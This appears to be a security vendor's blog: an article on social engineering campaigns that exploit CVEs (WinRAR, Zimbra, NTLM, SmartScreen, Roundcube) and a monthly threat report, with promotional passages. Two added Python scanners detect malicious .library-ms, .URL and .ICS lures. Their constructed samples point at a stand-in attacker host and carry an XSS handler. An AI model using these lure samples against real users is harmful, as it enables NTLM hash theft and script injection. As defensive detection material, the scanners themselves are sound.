Urgency, fear, curiosity, trust, greed, sympathy — social engineering has been wildly successful in exploiting human emotions in cyber attacks. Social engineering attacks have been identified as a top root cause in a high number of breaches. Most breach analysis reports place social engineering among the top initial-access techniques. The recent rise in AI-enabled phishing attacks and data theft further gives adversaries the upper hand with contextual personal data and sensitive business information at their disposal.

Verizon’s 2025 Data Breach Investigations Report (DBIR) attributes roughly 17% of breaches globally, and 20% in the Asia-Pacific (APAC) region, to its “Social Engineering” incident class. According to Sprinto, in 2025 social engineering was the initial access vector in ~36% of incidents. For enterprises, the consequences can be disastrous: ransomware, data theft, and operational downtime can produce revenue-shattering outcomes.

Among the most advanced social engineering campaigns lies a critical one-two punch: psychological manipulation combined with sophisticated exploitation of software flaws. Attack trajectories go beyond the “classical” phishing attack to steal a target’s username and password. They seek immediate unauthorized access to their victim’s computer, lateral movement within the local network, and data exfiltration—with one wrong click, in one fell swoop.

In this article, we will look at some sophisticated social engineering campaigns from the recent past; attacks that combine human deception with exploiting unpatched software flaws. Read on to find out more about the social engineering landscape and how proactive vulnerability management with OPENVAS SECURITY INTELLIGENCE supports a defense-in-depth cyber security strategy, including protection against advanced social engineering attacks.

Advanced Social Engineering Attacks Require a “Defense In Depth” Approach

The most sophisticated social engineering attacks blend human deception with technical exploitation. The classic “phishing attack” [T1566] tricks users into entering their credentials, including MFA codes, into a well-crafted, spoofed website. However, in more advanced variants of social engineering attacks, adversaries can achieve remote code execution (RCE) directly on the victim’s system for full system compromise, install persistent malware, or even move laterally within an organization’s internal network [T1210].

Here’s how sophisticated social engineering attacks work:

  • Phishing messages deliver malicious file attachments [T1566.001] or links [T1566.002] along with a social context urging the victim to click them [T1204].
  • Once clicked, the attacker’s malicious payload is executed. Depending on the design, it may attempt to steal data [T1003][T1005], exploit exposed software weaknesses on the victim’s local system [T1203], or pivot to accessible network services [T1210].
  • In some cases, attackers don’t need to communicate with their targets directly. By making malicious resources available on the public Internet [T1189], they let victims encounter them through deceptive ads [008] or while executing documents or software applications they believe to be safe [T1189][T1204].
  • Even if the first-stage social engineering attack does not directly exploit a software vulnerability, adversaries can import malware [T1105] for remote access to the victim’s computer.
  • Once inside, adversaries quickly seek to extend their unauthorized access; gain persistence [TA0003], escalate their privileges [TA0004], and move laterally within the network [TA0008].

In all these cases, unpatched software often means the difference between a benign security incident and an expensive data breach scenario. Defense-in-depth cyber security controls including vulnerability management, patching, and network segmentation help ensure that even if a social engineering attempt succeeds, the attacker cannot extend their reach. By continuously identifying and mitigating exploitable weaknesses, vulnerability management limits the blast radius of initial access and stops localized compromises from spreading across the environment.

How Greenbone Helps Defend Against Advanced Social Engineering Attacks

Greenbone helps organizations increase their resilience to advanced social engineering attacks by empowering defenders to close technical security gaps. Greenbone’s OPENVAS ENTERPRISE FEED includes over 200,000 individual vulnerability tests — truly an industry-leading detection engine. The feed is updated daily to ensure coverage of the latest emerging CVEs. A free trial of Greenbone’s OPENVAS BASIC is available for defenders to scan their enterprise IT infrastructure for emerging threats, including vulnerabilities exploited in advanced social engineering attacks.

Vulnerability management is considered a fundamental security activity [1][2][3]. By maintaining a continuous vulnerability management process, organizations can significantly reduce the likelihood that a single phishing email or malicious attachment turns into a full-scale breach. Scanning an IT environment allows security teams to identify and remediate flaws that could provide attackers with initial access, and it also helps prevent attackers from escalating privileges, moving laterally, or deploying malware after an initial breach. With Greenbone’s new OPENVAS REPORT product offering, enterprises gain clear risk insights across their entire IT infrastructure and can quickly compile advanced compliance reports.

Social Engineering Campaigns Exploiting Unpatched Software

Many advanced social engineering campaigns are known to exploit unpatched software flaws. In this section we will review some real-world campaigns that leverage advanced exploit chaining via file-attachment and link-based attacks. However, the campaigns described below only scratch the surface of known campaigns and new attacks emerge on a continuous basis.

CVE-2025-8088: WinRAR Allows Attackers to Create Malicious Files

In mid-July 2025, ESET observed active exploitation of CVE-2025-8088 (CVSS 8.8), affecting WinRAR, in ongoing social engineering attacks. CVE-2025-8088 allows unauthorized attackers to copy malicious files into sensitive directories, including the Windows Startup folder, to be executed automatically when the victim logs in. The technical details for this campaign were covered in detail on the Greenbone blog in August.

Attacks were attributed to RomCom (aka Storm-0978, Tropical Scorpius, UNC2596), a Russian-aligned threat actor known for operating its own signature malware (RomCom RAT). During the recent campaign leveraging CVE-2025-8088 in WinRAR, spearphishing emails delivered weaponized RAR archives to target financial, manufacturing, defense, and logistics companies in Europe and Canada. Greenbone’s OPENVAS ENTERPRISE FEED includes detection for CVE-2025-8088.

CVE-2025-27915: Malicious Calendar Links to Exploit Zimbra Collaboration Suite

In September 2025, a campaign targeted the Brazilian Military, delivering poisoned .ICS calendar files specially designed to exploit CVE-2025-27915 (CVSS 5.4), a stored cross-site scripting (XSS) vulnerability [CWE-79], in Zimbra Collaboration Suite. The phishing emails were disguised as legitimate invitations from foreign political entities. The .ICS files contained embedded JavaScript that executed automatically when viewed in Zimbra’s Classic Web Client. The iCalendar standard has an extensive history of security risks including XSS vulnerabilities across a number of enterprise software applications.

In the most recent campaign, attackers were able to steal session cookies, email content and contact lists, and to create malicious email forwarding rules that continuously exfiltrated communications from victims. Unpatched systems remain vulnerable and continue to be exploited in targeted attacks. Greenbone’s OPENVAS ENTERPRISE FEED includes detection for CVE-2025-27915.

CVE-2025-2783: Chrome Sandbox Escape to Deploy Spyware

In March 2025, phishing emails with invites to a Russian policy forum were used to lure victims into clicking on a malicious file. Once executed, the malicious files leveraged CVE-2025-2783 (CVSS 8.3), a sandbox bypass flaw in the Mojo component of Google Chrome for Windows, to deploy spyware. The campaign was nicknamed Operation ForumTroll.

CVE-2025-2783 stems from a flaw in Mojo IPC handle management and affects only the Windows implementation of Google Chrome; it allows attackers to bypass Chrome’s sandbox protection and reach the underlying Windows OS. Greenbone’s OPENVAS ENTERPRISE FEED includes detection for CVE-2025-2783 for Windows [1].

CVE-2025-24054: Windows NTLM Hash Leak Targeted Against European Entities

In March 2025, phishing emails with attached .library-ms files were delivered in attacks targeting government and private firms in Poland and Romania. The attacks exploited a newly disclosed vulnerability, CVE-2025-24054 (CVSS 5.4), impacting Windows NTLM; exploitation began days after the flaw was disclosed.

.library-ms files are XML files conforming to the Windows Library Description schema, used to define Explorer libraries. The malicious .library-ms files contained links to attacker-controlled resources and were delivered inside ZIP archives or linked via Dropbox. Merely viewing the file triggered Windows’ SMB authentication feature, leaking NTLM authentication hashes, which the attackers replayed to achieve domain compromise and lateral movement in the victims’ networks.

CVE-2024-21412: Windows SmartScreen Bypass by DarkGate Operators

In mid-January 2024, the threat-actor group behind DarkGate malware began exploiting CVE-2024-21412 (CVSS 8.1), a bypass of Microsoft Defender SmartScreen caused by incorrect internet-shortcut handling. Phishing emails delivered PDF attachments with embedded links, diverting victims to .URL shortcut files which loaded fake software installers. The installers masqueraded as legitimate software (such as NVIDIA or iTunes) and sideloaded a malicious DLL to deploy DarkGate RAT malware.

The campaign targeted financial organizations across North America, Europe, Asia, and Africa. Microsoft issued a patch for CVE-2024-21412 on February 13th, 2024. However, this campaign wasn’t the first to exploit Windows SmartScreen in social engineering attacks. In 2023, CVE-2023-36025 was similarly observed under active exploitation. Greenbone’s OPENVAS ENTERPRISE FEED includes detection for CVE-2024-21412 [1][2][3][4][5].
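Both the .library-ms lures above and the .URL shortcuts in the DarkGate campaign work the same way at the file level: a small, legitimate-looking Windows file carries a target that points at a remote host, and Explorer or the shell follows it. The following triage helper is an added example and not code from Greenbone, Microsoft or any of the reports cited; it parses both formats and flags any target that refers to a network host rather than the local machine. The sample file contents and the hostname are constructed placeholders.

```python
"""Triage helper for Windows shortcut-style lure files.

Added example, not code from Greenbone or Microsoft. It parses the two
file types named above (.library-ms, an XML Library Description file, and
.URL, an INI-style Internet Shortcut) and flags any target that points at
a network host: UNC paths and remote URLs are what triggered outbound NTLM
authentication or loaded remote installers in the campaigns described.
The sample contents below are constructed; the hostname is a placeholder.
"""
import configparser
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}
REMOTE_SCHEMES = {"http", "https", "ftp", "smb", "file", "webdav", "davs"}


def is_remote_target(target: str) -> bool:
    """True if a URL or path refers to a host other than the local machine."""
    t = target.strip()
    if t.startswith("\\\\") or t.startswith("//"):
        return True  # UNC path (\\host\share): Explorer will authenticate to it
    parsed = urlparse(t)
    if parsed.scheme.lower() not in REMOTE_SCHEMES:
        return False  # drive letters ("C:\...") parse as scheme "c"; plain paths have none
    host = parsed.hostname
    # file:///C:/local/path has no host and stays local
    return host is not None and host.lower() not in LOCAL_HOSTS


def scan_library_ms(xml_text: str) -> list:
    """Return remote <url> targets found in a .library-ms document."""
    # stdlib expat does not fetch external entities, so this is safe on untrusted input
    root = ET.fromstring(xml_text)
    hits = []
    for el in root.iter():
        tag = el.tag.rsplit("}", 1)[-1]  # drop the XML namespace prefix
        if tag == "url" and el.text and is_remote_target(el.text):
            hits.append(el.text.strip())
    return hits


def scan_url_file(ini_text: str) -> list:
    """Return remote targets (URL= and IconFile=) found in a .URL shortcut."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(ini_text)
    hits = []
    for section in cp.sections():
        for key, value in cp.items(section):
            # configparser lower-cases keys; the shortcut format is case-insensitive anyway
            if key in ("url", "iconfile") and is_remote_target(value):
                hits.append(value.strip())
    return hits


# Constructed samples, modelled on the two lure types described above.
SAMPLE_LIBRARY_MS = """<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\attacker.example.invalid\\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

SAMPLE_URL = """[InternetShortcut]
URL=file://attacker.example.invalid/share/setup.msi
IconFile=\\\\attacker.example.invalid\\share\\icon.ico
IconIndex=1
"""

if __name__ == "__main__":
    for name, hits in (("sample.library-ms", scan_library_ms(SAMPLE_LIBRARY_MS)),
                       ("sample.url", scan_url_file(SAMPLE_URL))):
        print(f"{name}: {'REMOTE TARGETS ' + str(hits) if hits else 'no remote targets'}")
```

The check deliberately treats `file://` URLs with a host and `IconFile=` entries the same as `URL=`, because an icon resource on a remote share is enough to make Explorer authenticate outbound; a mail gateway or sandbox can quarantine on any hit rather than trying to judge the destination.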

CVE-2024-42009: Roundcube Webmail XSS Flaw Exploited by UNC1151

In June 2025, a sophisticated spear-phishing campaign targeted Polish organizations via CVE-2024-42009 (CVSS 9.3), a critical cross-site scripting (XSS) flaw in Roundcube Webmail that allows arbitrary JavaScript execution in a user’s browser when a specially crafted email is simply opened.

In these attacks, the UNC1151 threat group sent invoice-themed emails which triggered the flaw to register a malicious Service Worker in the victim’s browser. The malware then proxied the legitimate Roundcube login page while silently harvesting credentials, stealing address books, and executing Business Email Compromise (BEC) attacks. Greenbone’s OPENVAS ENTERPRISE FEED provides detection for CVE-2024-42009.

CVE-2023-36884: Windows Search Exploited for RCE by Storm-0978

In mid-2023, threat actors leveraged social engineering to exploit CVE-2023-36884 (CVSS 7.5), a race condition flaw [CWE-362] in Windows Search. The campaign, attributed to the RomCom threat actor, distributed Word documents and exploited urgency surrounding the Ukrainian World Congress, targeting staff at defense and government entities in Europe and North America. Once opened, the documents downloaded scripts, injected iframes and staged remote malware to exploit CVE-2023-36884.

The campaign resulted in financial losses, data theft, and operational disruption for targeted organizations while enabling espionage via credential compromise and deployment of persistent remote access malware. Greenbone’s OPENVAS ENTERPRISE FEED includes detection for CVE-2023-36884.

Isn’t User Awareness Training Enough?

Many organizations begin user awareness training programs with high hopes. However, its effectiveness has been called into question. While some findings indicate that training significantly improves recognition of phishing attempts, these gains were found to fade over time without continuous reinforcement [1][2][3]. Improvement was also shown to differ by individual and to require time to become effective [4]. Another study found that combining user awareness training with technical controls (e.g., MFA/OTPs and URL/barrier filters) yields better prevention outcomes than training alone [5]. Other studies reported negative findings associated with user awareness training:

  • A large-scale study in 2025 found no significant benefits of training on click-rates or reporting rates [6].
  • 43% of users executed at least one dangerous action over the course of a 15-month study [7].
  • Inconsistent reinforcement or unrealistic simulations risk normalizing artificial behaviors, decreasing effectiveness against real-world attacks over time [8].
  • While user awareness training showed a slightly positive effect in reducing susceptibility to social engineering, the resulting p-value (0.141) was non-significant [9].
  • Annual awareness training did not reduce phishing susceptibility, while simulation-based training resulted in a statistically significant but very small improvement. Furthermore, training has low engagement rates; 75–90% spend less than one minute on training [10].

Therefore, while user awareness training may provide some protection against the most basic social engineering attacks, it is little comfort against highly targeted, sophisticated campaigns. For high resilience, defenders must plan additional security measures. Vulnerability management is a fundamental defense-in-depth security control for mitigating the impact of sophisticated social engineering attacks. By prioritizing patches for assets affected by flaws identified in active exploitation campaigns, organizations can reduce their risk of unauthorized initial access and prevent a widespread breach.

Summary

The most advanced social engineering attacks are not just out to steal usernames and passwords. Sophisticated social engineering campaigns draw on stolen personal and business information to build highly effective emotional triggers. They also deploy technical payloads that seek to exploit software vulnerabilities on the victim’s computer and within the target’s network. To protect against the worst outcomes, defenders need a defense-in-depth strategic approach to cyber security, including continuous vulnerability management. A free trial of Greenbone’s OPENVAS BASIC is available for defenders to scan their enterprise IT infrastructure for emerging threats, including vulnerabilities exploited in advanced social engineering attacks.

Using Greenbone’s suite of security tools, defenders are better positioned to detect software vulnerabilities at scale within their IT environments, prioritize, and patch exposed attack surfaces that APT adversaries are poised to exploit. A free trial of OPENVAS BASIC is a great opportunity to put Greenbone’s security capabilities to the test; OPENVAS SECURITY INTELLIGENCE allows organizations to experience first-hand how automated vulnerability scanning, daily feed updates, and clear risk reporting can empower defenders against evolving social engineering and other exploitation campaigns.

Just over 4,100 new CVEs emerged in October 2025, representing new attack surfaces and placing pressure on defenders to identify and patch. For operational resilience, organizations need to scan their IT infrastructure often and prioritize mitigation efforts.

A free trial of Greenbone’s OPENVAS BASIC lets defenders scan their enterprise IT estate and stay on top of emerging threats. The trial includes access to Greenbone’s OPENVAS ENTERPRISE FEED, delivering industry-leading coverage for CVEs and other IT security vulnerabilities. This month’s threat report will cover some of the most critical new vulnerabilities being actively exploited, and emerging high-risk CVEs with widespread exposure.

Oracle EBS Exploited in Two Separate Ransomware Campaigns

CVE-2025-61882 (CVSS 9.8, EPSS ~99th pctl) is an unauthenticated remote code execution (RCE) flaw in Oracle E-Business Suite (EBS), actively exploited since at least August 9, 2025 [1][2]. The CVE is being used in mass exploitation campaigns for data-theft and extortion by the Cl0p ransomware [S0611] operator. Public PoC exploits appeared in early October and a detailed technical analysis is available.

Besides CVE-2025-61882, CVE-2025-61884 (CVSS 7.5, EPSS ~93rd pctl), a Server-Side Request Forgery (SSRF) flaw [CWE-918], also in Oracle EBS, was actively exploited in October 2025. CVE-2025-61884 was added to CISA KEV and has been used to deploy ransomware [T1486]. Attacks leveraging CVE-2025-61882 reportedly used data theft for extortion. However, attacks exploiting CVE-2025-61884 have used file encryption for ransom impact.

Both CVEs received alerts from numerous national CERT entities globally [3][4][5][6][7][8][9][10]. Greenbone’s OPENVAS ENTERPRISE FEED includes an active check and remote version check for CVE-2025-61882, and a remote version check for CVE-2025-61884, allowing defenders to identify vulnerable assets. According to Oracle’s official advisories [11][12], versions 12.2.3 to 12.2.14 of EBS are affected.

Smartbedded Meteobridge Now Actively Exploited Via CVE-2025-4008

CVE-2025-4008 (CVSS 8.8, EPSS ~97th pctl), published on May 13, 2025, is a remote unauthenticated command injection vulnerability [CWE-77] in Smartbedded Meteobridge, now actively exploited. The flaw resides in the template.cgi script of the Meteobridge web interface, which passes unsanitized request input to eval() calls. Exploitation allows attackers to execute arbitrary commands with root privileges on affected devices. Smartbedded Meteobridge is a gateway that connects personal weather stations to public networks. Shodan reveals roughly 70–130 devices exposed on the public internet.

A proof-of-concept (PoC) exploit and full technical write-up were published by ONEKEY, which discovered the flaw during firmware analysis. While the vendor’s official advisory claims that Internet exposure is a “precondition for exploiting any security vulnerability”, insider attacks can also present high risk to organizations. Greenbone is able to detect vulnerable instances of Smartbedded Meteobridge with an active check and remote version check. Users should upgrade to version 6.2 or later.

RediShell: A 13-Year-Old Lua Flaw Allows RCE in Redis

CVE-2025-49844 (CVSS 9.9, EPSS ~90th pctl) allows authenticated RCE on all unpatched Redis instances with Lua scripting enabled. The flaw, nicknamed RediShell, is caused by a use-after-free vulnerability [CWE-416] in the Lua garbage collector. Lua scripting is enabled by default, and Redis instances are often deployed with authentication disabled, which compounds the risk from weak configuration.

Redis is prevalent in cloud environments and has been a hot target for cryptomining [T1496] and ransomware [T1486] leveraging P2PInfect, Redigo, HeadCrab, and Migo malware. A PoC exploit for CVE-2025-49844 confirms exploitability, along with two additional Lua engine flaws:

Multiple national security alerts have been issued for the CVEs [1][2][3][4][5][6]. OPENVAS ENTERPRISE FEED includes authenticated security checks to identify exposure across many Linux environments. Redis has issued a patch and additional mitigations can be found in the vendor’s official advisory.

Emergency Out-of-Band Patch for Windows Server Update Service and More Microsoft Risks Emerge

Microsoft’s October security update disclosed a total of 201 new CVEs. Two were flagged as “Exploitation Detected” and 14 as “Exploitation more likely”. In addition to these disclosures, an emergency alert was issued by CISA for CVE-2025-59287, affecting the Windows Server Update Service (WSUS). Here are brief descriptions of the most high-risk emerging threats to Microsoft products:

  • CVE-2025-59287 (CVSS 9.8, EPSS ~70th pctl): A flaw in WSUS allows unauthorized RCE when untrusted data is deserialized [CWE-502]. Numerous national CERT alerts have been published, many referencing a public PoC exploit [1][2][3][4][5][6][7][8][9]. Microsoft’s official advisory also acknowledges a PoC exploit exists.
  • CVE-2025-33073 (CVSS 8.8, EPSS ~97th pctl): A Windows SMB vulnerability allows an authorized attacker to remotely achieve privilege escalation [CWE-284] to SYSTEM level. The flaw was added to CISA KEV.
  • CVE-2025-59230 (CVSS 7.8, EPSS ~95th pctl): An elevation of privilege vulnerability [CWE-284] in the Windows Remote Access Connection Manager has been added to CISA KEV.
  • CVE-2025-24990 (CVSS 7.8, EPSS ~91st pctl): The end-of-life (EOL) third party Agere Modem driver in Microsoft Windows is now considered actively exploited. The flaw is due to an untrusted pointer dereference [CWE-822] which can lead to arbitrary code execution.
  • CVE-2025-55315 (CVSS 9.9): A security feature bypass vulnerability in .NET Core can lead to HTTP request smuggling [CWE-444]. An authenticated attacker could exploit the flaw to bypass front-end security controls, hijack user sessions, or perform request-forgery attacks. A public technical description increases the risk. See the official security advisory for affected versions and patches.
  • CVE-2025-59502 (CVSS 7.5, EPSS ~81st pctl): An unauthorized attacker can remotely induce uncontrolled resource consumption [CWE-400] in Windows Remote Procedure Call (RPC), resulting in Denial of Service (DoS). Microsoft classifies the CVE as “Exploitation More Likely”.
  • CVE-2025-47827 (CVSS 4.6): Secure Boot can be bypassed because the igel-flash-driver module improperly verifies a cryptographic signature [CWE-324]. The flaw allows a malicious root filesystem to be mounted from an unverified SquashFS image. Even though the vulnerability arises in IGEL OS, the attack chain has implications for Windows/UEFI systems. Microsoft has flagged this flaw as actively exploited and a technical description with PoC exploit is available.

Greenbone provides robust detection for Microsoft’s recent security updates. The OPENVAS ENTERPRISE FEED includes detection for 156 (78%) of the 201 newly disclosed CVEs affecting Microsoft products.

Defenders Still “Living On the Edge”: Constant Flow of Perimeter Device Flaws

Greenbone’s June 2024 Threat Report first began tracking high-risk vulnerabilities in perimeter network devices. Since then, edge vulnerabilities have continued to surface unabated. In this section, we will review emerging threats to devices meant to protect internal networks from attacks.

F5 Hack: Multiple New Vulnerabilities in F5 Products Disclosed

In October 2025, F5 disclosed that a “highly sophisticated nation-state” adversary had long-term, persistent access to its internal systems, indicating a dwell time of at least 12 months. The attackers stole BIG-IP source code and internal vulnerability information. The data theft prompted an urgent publication of CVEs that had been triaged in F5’s vulnerability pipeline.

In total, 44 new CVEs were published for F5 products in October 2025, several of which were the subject of national CERT alerts [1][2][3][4][5][6][7][8][9][10]. Active exploitation has not been reported and no PoC exploits have been published. However, F5 vulnerabilities are often used in ransomware attacks. In response, Greenbone added new security tests for F5 devices, covering 32 (73%) of the 44 new CVEs.

Fresh CVEs in Ivanti Products for Defenders to Patch

Trend Micro’s Zero Day Initiative (ZDI) publicly disclosed 14 unpatched vulnerabilities in Ivanti Endpoint Manager (EPM) after months of unsuccessful coordination with Ivanti. According to reports, Ivanti requested six months to address the flaws. ZDI’s disclosure effectively exposed these flaws as “zero-day” vulnerabilities, meaning attackers could now exploit them before patches are available.

Greenbone is able to detect all of ZDI’s newly disclosed CVEs and Ivanti CVEs disclosed by other security researchers. Greenbone’s OPENVAS ENTERPRISE FEED includes detection tests for all 17 Ivanti CVEs disclosed in October 2025.

Fortinet’s Products Exposed to 32 New CVEs in October

In total, 32 CVEs were published for Fortinet products in October 2025. However, only 17 of these are listed on the vendor’s official advisory page. Greenbone added checks for 21 of the 32 new CVEs, providing high detection coverage for defenders using Fortinet devices. Fortinet has 20 CVEs listed in CISA’s KEV catalog; 13 of these are associated with ransomware attacks indicating high risk for customers.

Critical Unauthenticated RCE in WatchGuard Fireware OS

CVE-2025-9242 (CVSS 9.3, EPSS ~90th pctl), affecting WatchGuard Fireware OS, allows unauthenticated RCE. Fireware OS is the operating system of the vendor’s firewalls, VPN gateways, policy enforcement and intrusion prevention systems (IPS). watchTowr security researchers have published a technical description and PoC exploit, increasing the risk.

Several alerts have been issued from government agencies regarding CVE-2025-9242 [1][2][3]. The OPENVAS ENTERPRISE FEED includes a remote version check to identify affected appliances. Users should update to version 12.3.1_Update3, 12.5.13, 12.11.4, 2025.1.1 or later and review the vendor’s official advisory for more information.

CVE-2025-59978: Junos Space Flaw Lets Authenticated Attackers Inject Malicious Scripts

CVE-2025-59978 (CVSS 9.0) is a stored XSS flaw [CWE-79] in Juniper Networks’ Junos Space. Junos Space is a network management and orchestration platform that provides centralized management of Juniper’s routers, switches and security devices. The vulnerability lets a low-privileged authenticated attacker inject JavaScript <script> tags which execute with a viewing admin’s privileges. No active exploitation or public PoCs are yet known. Greenbone’s OPENVAS ENTERPRISE FEED includes a remote version check to identify vulnerable instances. All Junos Space versions before 24.1R4 are affected. See the official security advisory for more information.

Local Privilege Escalation Flaw in VMware Exploited In-The-Wild

CVE-2025-41244 (CVSS 7.8), published in September 2025, is now flagged as actively exploited. Multiple sources have linked in-the-wild exploitation to UNC5174, a China-linked threat actor. The flaw is a local privilege escalation [CWE-284] when VMware Tools is managed by Aria Operations with SDMP enabled. Successful exploitation allows a local attacker to escalate privileges to root on the same VM. A technical analysis and PoC exploit are available, increasing the risk.

The VMware platform has appeared on CISA KEV 26 times including this latest CVE; 8 of these entries indicate use in ransomware attacks. CERT advisories have been issued by agencies in various countries [1][2][3][4]. So far in 2025, a total of 40 CVEs have been issued across all VMware platforms. In response, Greenbone has added detection to both the OPENVAS ENTERPRISE FEED and COMMUNITY feed, covering 36 (90%) of VMware’s 2025 vulnerabilities.

To mitigate attacks, Windows users should update to VMware Tools 12.5.4 (Windows 32-bit: 12.4.9). Linux users should update to vendor-provided open-vm-tools. If you can’t patch immediately, disable SDMP and strictly limit guest access. Specific versions of VMware Aria Operations, VMware Tools, VMware Cloud Foundation, VMware Telco Cloud Platform and VMware Telco Cloud Infrastructure are affected. See the official advisory for more details.

Gladinet CentreStack Flaw Allows Machine Key Theft and RCE

CVE-2025-11371 (CVSS 9.8, EPSS 89th pctl) is an unauthenticated Local File Inclusion (LFI) flaw [CWE-552] that allows remote attackers to read arbitrary files, including the Web.config, in Gladinet CentreStack and Triofox. In-the-wild attacks have been observed in which the LFI flaw was exploited to retrieve the machine key from Web.config and then forge ASP.NET ViewState payloads. For RCE, attackers are exploiting another ViewState deserialization flaw: CVE-2025-30406 (CVSS 9.8, EPSS ~99th pctl). A detailed technical description and attack chain analysis are publicly available.

Greenbone’s OPENVAS ENTERPRISE FEED has included detection tests for both CVEs described above since April 2025 [1][2]. CentreStack has published patches for users to prevent exploitation. According to Gladinet’s official advisory, users who can’t patch should disable the temp handler in UploadDownloadProxy’s Web.config to block the unauthenticated /storage/t.dn endpoint abused for LFI.

Zimbra Zero-Day Used to Target Brazilian Military

CVE-2025-27915 (CVSS 5.4, EPSS 97th pctl) is a stored cross-site scripting (XSS) vulnerability [CWE-79] in Zimbra Collaboration Suite (ZCS). The flaw is caused by insufficient sanitization of HTML content contained in .ICS calendar files. As a result, attackers can launch phishing attacks with malicious .ICS calendar invites [T1566.001] to execute arbitrary JavaScript within a victim’s webmail session.

The CVE has been exploited in targeted attacks against the Brazilian military and added to CISA KEV. Belgium’s CERT.be has published a security advisory. ZCS is highly targeted by threat actors: CISA KEV contains 14 ZCS CVEs, five of which are associated with ransomware attacks [T1486]. Greenbone’s OPENVAS ENTERPRISE FEED includes a remote banner check to identify vulnerable instances. The flaw affects ZCS versions 9.0, 10.0, and 10.1. Users should upgrade to the latest version and be especially cautious handling email attachments.
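The CVE-2025-27915 description here and in the social engineering section above comes down to one mechanism: HTML inside the text fields of an .ICS invite is rendered by the webmail client without sanitization. The following scanner is an added example, not Zimbra’s or Greenbone’s code; it implements just enough of RFC 5545 (line unfolding, property parameters, backslash escapes) to inspect the text-bearing properties of an invite correctly, and shows why unfolding matters: a handler attribute split across a folded line is invisible to a line-by-line grep. The sample invite is constructed.

```python
"""Scan an iCalendar (.ICS) invite for active HTML content in its text fields.

Added example, not Zimbra's or Greenbone's code. It implements just enough of
RFC 5545 to do the check correctly: long lines are unfolded (a CRLF followed
by one space or tab continues the previous line), property parameters such
as FMTTYPE=text/html are separated from the value, and backslash escapes are
decoded. The text-bearing properties are then searched for markup that a
webmail client might render as script. The sample invite is constructed.
"""
import re

# Properties whose values a calendar client may render as text or HTML.
TEXT_PROPERTIES = {"DESCRIPTION", "X-ALT-DESC", "SUMMARY", "LOCATION", "COMMENT"}

# Markup that should never appear in a calendar invite. Crude by design:
# an inline event handler or script tag is enough to quarantine the file.
ACTIVE_CONTENT = re.compile(
    r"<\s*(script|iframe|object|embed)\b|\bon[a-z]+\s*=|javascript:",
    re.IGNORECASE,
)


def unfold(ics_text: str) -> list:
    """Join folded continuation lines (RFC 5545 section 3.1)."""
    lines = []
    for raw in ics_text.replace("\r\n", "\n").split("\n"):
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]  # the single leading whitespace is removed on unfolding
        else:
            lines.append(raw)
    return [line for line in lines if line]


def unescape(value: str) -> str:
    """Decode the TEXT escapes for newline, comma, semicolon and backslash."""
    return re.sub(r"\\([\\;,nN])",
                  lambda m: "\n" if m.group(1) in "nN" else m.group(1), value)


def parse_property(line: str):
    """Split 'NAME;PARAM=VALUE:value' into (name, params, value) or None."""
    in_quotes = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == ":" and not in_quotes:
            name_part, value = line[:i], line[i + 1:]
            break
    else:
        return None  # not a property line
    pieces = name_part.split(";")
    params = {}
    for p in pieces[1:]:
        k, _, v = p.partition("=")
        params[k.upper()] = v.strip('"')
    return pieces[0].upper(), params, unescape(value)


def scan_ics(ics_text: str) -> list:
    """Return (property, matched_markup) pairs for every suspicious text field."""
    findings = []
    for line in unfold(ics_text):
        parsed = parse_property(line)
        if parsed is None:
            continue
        name, _params, value = parsed
        if name in TEXT_PROPERTIES:
            m = ACTIVE_CONTENT.search(value)
            if m:
                findings.append((name, m.group(0)))
    return findings


# Constructed sample. The HTML description is folded mid-attribute, so a
# line-by-line grep for "onerror=" would miss it; unfolding first does not.
SAMPLE_ICS = (
    "BEGIN:VCALENDAR\r\n"
    "VERSION:2.0\r\n"
    "PRODID:-//constructed sample//EN\r\n"
    "BEGIN:VEVENT\r\n"
    "UID:sample-1@example.invalid\r\n"
    "DTSTART:20250901T100000Z\r\n"
    "SUMMARY:Invitation\r\n"
    "DESCRIPTION:Please see the agenda below\\, then confirm.\r\n"
    "X-ALT-DESC;FMTTYPE=text/html:<html><body>Agenda<img src=x onerr\r\n"
    " or=\"runPayload()\"></body></html>\r\n"
    "END:VEVENT\r\n"
    "END:VCALENDAR\r\n"
)

if __name__ == "__main__":
    for prop, hit in scan_ics(SAMPLE_ICS):
        print(f"suspicious {prop}: matched {hit!r}")
```

A gateway using this check would quarantine on any finding rather than attempt to strip the markup, since the rendering behaviour that matters belongs to the client, not the scanner; the regular expression is intentionally broad and will occasionally flag benign text such as `one = two`, which is the right trade-off for an attachment type that has no business carrying script.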

Critical Kentico Xperience Flaws are Actively Exploited

CVE-2025-2746 and CVE-2025-2747 (both CVSS 9.8) allow unauthenticated remote attackers to gain full administrative control of Kentico Xperience via an authentication bypass [CWE-288] flaw. Both CVEs are actively exploited. Exploitation enables attackers to manipulate or exfiltrate CMS data and deploy malicious payloads with administrative privileges.

A full technical description and PoC exploits increase the risk of near-future exploitation. Multiple national CERT advisories have been published for the new CVEs [1][2][3]. The OPENVAS ENTERPRISE FEED includes an active check for CVE-2025-2746 and an active check and remote version check for CVE-2025-2747. Versions through 13.0.172 and 13.0.178 are affected and the vendor has published hotfixes for mitigation.

New High-Severity Flaw in Zoho ManageEngine ADManager Plus

CVE-2025-10020 (CVSS 8.8, EPSS ~73rd pctl) is an authenticated command injection vulnerability [CWE-77] in the Custom Script component of ManageEngine ADManager Plus. The flaw allows attackers with low-privileged access to gain arbitrary RCE. ManageEngine is a widely used on-prem solution for system administrators, IT operations teams, and security engineers to monitor, automate, and secure IT infrastructures.

Although no active exploitation, public technical description or PoC exploit is yet known, ManageEngine has historically attracted attention from cyber adversaries. This makes CVE-2025-10020 high risk when combined with stolen credentials or insider attacks. The ManageEngine platform is listed on CISA KEV nine times, twice for ransomware attacks (CVE-2022-47966 and CVE-2021-40539). Updating to version 8024 is strongly recommended.

The OPENVAS ENTERPRISE FEED provides:

  • A remote version check to detect servers vulnerable to CVE-2025-10020
